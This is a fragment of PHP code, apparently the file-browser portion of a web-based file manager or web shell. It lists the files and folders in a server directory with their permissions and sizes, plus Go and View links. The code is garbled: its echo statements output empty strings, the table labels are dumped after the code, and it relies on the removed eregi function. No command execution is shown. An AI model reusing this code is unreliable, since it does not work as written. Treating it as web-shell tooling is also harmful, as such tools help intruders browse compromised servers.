"; //Shows all files $dirs = array(); $files = array(); foreach (glob("*") as $contents){ if($dir != ""){ if(is_file($contents)){ if(strpos($dir,"/") !== FALSE) $files[] = $dir."/".$contents; elseif(strpos($dir,"\\") !== FALSE) $files[] = $dir."\\".$contents; } elseif(is_dir($contents)){ if(strpos($dir,"/") !== FALSE) $dirs[] = $dir."/".$contents; elseif(strpos($dir,"\\") !== FALSE) $dirs[] = $dir."\\".$contents; } } else{ if(is_file($contents)) $files[] = $contents; elseif(is_dir($contents)) $dirs[] = $contents; } } for($a = 0; $a < count($dirs); $a++){ if(strpos($dirs[$a],"/") !== FALSE){ $dir_name = explode("/",$dirs[$a]); $dir_name = $dir_name[count($dir_name) - 1]; } elseif(strpos($dirs[$a],"\\") !== FALSE){ $dir_name = explode("\\",$dirs[$a]); $dir_name = $dir_name[count($dir_name) - 1]; } else $dir_name = $dirs[$a]; $permission = getperms($dir_name); if(eregi($_SERVER['DOCUMENT_ROOT'],$dirs[$a])){ $tmp_a = explode($_SERVER['DOCUMENT_ROOT'],$dirs[$a]); $dirz = $tmp_a[1]; } echo ""; } for($a = 0; $a < count($files); $a++){ if(strpos($files[$a],"/") !== FALSE){ $file_name = explode("/",$files[$a]); $file_name = $file_name[count($file_name) - 1]; } elseif(strpos($files[$a],"\\") !== FALSE){ $file_name = explode("\\",$files[$a]); $file_name = $file_name[count($file_name) - 1]; } else $file_name = $files[$a]; $permission = getperms($file_name); if(eregi($_SERVER['DOCUMENT_ROOT'],$files[$a])){ $tmp_a = explode($_SERVER['DOCUMENT_ROOT'],$files[$a]); $filez = $tmp_a[1]; } else $filez = $files[$a]; echo ""; } echo "
 NameGo / ViewSizePermissionsActions
".$dir_name."
Go
 --- ".$permission."
".$file_name."
View
 ".totalsize($file_name)." ".$permission."

"; ?>